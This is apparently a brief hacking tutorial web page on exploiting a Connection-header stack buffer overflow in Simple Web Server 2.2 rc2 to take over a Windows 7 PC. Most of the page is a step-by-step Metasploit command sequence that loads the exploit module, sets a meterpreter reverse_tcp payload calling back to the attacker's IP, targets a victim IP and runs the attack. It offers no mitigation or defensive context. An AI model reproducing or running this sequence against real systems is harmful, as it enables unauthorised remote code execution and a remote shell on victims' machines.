Hack Remote Windows 7 PC using Simple Web Server Connection Header Buffer Overflow

This module exploits vulnerability in Simple Web Server 2.2 rc2. A remote user can send a long string data in the Connection Header to causes an overflow on the stack when function vsprintf () is used, and gain arbitrary code execution. The module has been tested successfully on Windows 7 SP1 and Windows XP SP3…

Exploit Targets

Simple Web Server 2.2-rc2

Windows XP SP2

Windows 7

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

Open backtrack terminal typeĀ msfconsole

Now type use exploit/windows/http/sws_connection_bof

msf exploit(sws_connection_bof) > set payload windows/meterpreter/reverse_tcp

msf exploit(sws_connection_bof) > set lhost 192.168.1.4 [IP of Local Host]

msf exploit(sws_connection_bof) > set rhost 192.168.1.9 [IP of Victim PC]

msf exploit(sws_connection_bof) > exploit

Leave a Reply

Your email address will not be published. Required fields are marked *